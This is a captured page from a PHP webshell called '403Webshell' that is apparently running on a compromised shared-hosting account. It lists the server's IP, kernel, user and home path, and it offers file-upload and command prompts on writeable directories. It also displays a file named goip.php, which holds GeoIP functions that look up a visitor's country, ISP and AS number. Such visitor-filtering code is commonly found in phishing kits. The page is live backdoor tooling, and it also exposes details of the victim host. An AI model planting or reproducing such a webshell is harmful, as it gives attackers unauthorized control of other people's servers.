403Webshell
Server IP : 51.91.236.193  /  Your IP : 216.73.216.224
Web Server : Apache
System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : institutah ( 16501)
PHP Version : 7.2.34
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/institutah/www/eMwRWHmhFhW/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/institutah/www/eMwRWHmhFhW//goip.php
<?php
define('DPATH', __DIR__."/Geoip");
function getC($ip) { include_once(DPATH.'/geoip.inc'); if((strpos($ip, ':') === false)) { $gi = geoip_open(DPATH.'/GeoIP.dat',GEOIP_STANDARD); return geoip_country_code_by_addr($gi, $ip); geoip_close($gi);  } else { $gi = geoip_open(DPATH.'/GeoIPv6.dat',GEOIP_STANDARD);  return geoip_country_code_by_addr_v6($gi, $ip); geoip_close($gi); } }
function getisp($ip) { include_once(DPATH.'/geoip.inc'); if((strpos($ip, ':') === false)) { $giisp = geoip_open(DPATH."/GeoIPISP.dat", GEOIP_STANDARD); return geoip_org_by_addr($giisp, $ip); geoip_close($giisp); } else { $json_url = "http://ip-api.com/json/".$ip."?fields=isp"; $json = file_get_contents_curl($json_url, $retries=1); $query = json_decode($json, TRUE); $isp = $query['isp']; return $isp; } }
function getas($ip) { include_once(DPATH.'/geoip.inc'); if((strpos($ip, ':') === false)) { $gias = geoip_open(DPATH.'/GeoIPASNum.dat',GEOIP_STANDARD); $asl = geoip_name_by_addr($gias, $ip); $asid = explode(' ', $asl); $aspd = trim($asid[0]); return $aspd; geoip_close($gias); } else { $gias = geoip_open(DPATH.'/GeoIPASNumv6.dat',GEOIP_STANDARD); $asl = geoip_name_by_addr_v6($gias, $ip); $asid = explode(' ', $asl); $aspd = trim($asid[0]); return $aspd; geoip_close($gias); } }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit